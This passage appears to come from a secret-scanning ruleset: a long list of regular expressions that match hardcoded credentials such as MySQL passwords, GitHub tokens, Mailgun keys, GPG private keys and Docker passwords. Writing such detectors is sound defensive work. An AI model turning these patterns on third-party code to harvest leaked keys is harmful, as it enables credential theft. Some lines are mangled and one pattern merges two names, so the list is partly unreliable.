+ ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysqlmasteruser[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?root[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?hostname[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?my[_-]?secret[_-]?env[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?workspace[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?workflow[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?disconnect[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?connect[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?bob[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?minio[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?minio[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mile[_-]?zero[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mh[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mh[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mg[_-]?public[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mg[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapboxaccesstoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapbox[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapbox[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?manifest[_-]?app[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?manifest[_-]?app[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mandrill[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?managementapiaccesstoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?management[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?manage[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?manage[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?secret[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?pub[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?pub[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?priv[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailer[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailchimp[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailchimp[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mail[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?magento[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?magento[_-]?auth[_-]?username [\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?magento[_-]?auth[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?happo[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?happo[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?looker[_-]?test[_-]?runner[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ll[_-]?shared[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ll[_-]?publish[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?linux[_-]?signing[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lighthouse[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lektor[_-]?deploy[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lektor[_-]?deploy[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?leanplum[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kxoltsn3vogdop92m[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kubeconfig[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kubecfg[_-]?s3[_-]?path[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kovan[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?keystore[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kafka[_-]?rest[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kafka[_-]?instance[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kafka[_-]?admin[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?jwt[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?jdbc:mysql[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?jdbc[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?jdbc[_-]?databaseurl[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?itest[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ios[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?internal[_-]?secrets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?integration[_-]?test[_-]?appid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?integration[_-]?test[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?index[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ij[_-]?repo[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ij[_-]?repo[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hub[_-]?dxia2[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?homebrew[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hockeyapp[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?heroku[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?heroku[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?heroku[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hb[_-]?codesign[_-]?key[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hb[_-]?codesign[_-]?gpg[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hab[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hab[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?grgit[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gren[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gradle[_-]?signing[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gradle[_-]?signing[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gradle[_-]?publish[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gradle[_-]?publish[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?secret[_-]?keys[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?passphrase[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?ownertrust[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?keyname[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?key[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?maps[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?client[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?client[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?account[_-]?type[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gogs[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gitlab[_-]?user[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?tokens[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?repo[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?release[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?pwd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?oauth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?hunter[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?hunter[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?deployment[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?committer[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?committer[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?author[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?author[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ghost[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ghb[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?repo[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?next[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcs[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcr[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcloud[_-]?service[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcloud[_-]?project[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcloud[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?pw[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?login[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?fossa[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?flickr[_-]?api[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?flickr[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?flask[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firefox[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?project[_-]?develop[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?api[_-]?json[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?file[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?exp[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?eureka[_-]?awssecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?sonatype[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?heroku[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?github[_-]?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?end[_-]?user[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?encryption[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?elasticsearch[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?elastic[_-]?cloud[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dsonar[_-]?projectkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dsonar[_-]?login[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?droplet[_-]?travis[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dropbox[_-]?oauth[_-]?bearer[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?doordash[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dockerhubpassword[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dockerhub[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?postgres[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?passwd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?hub[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - 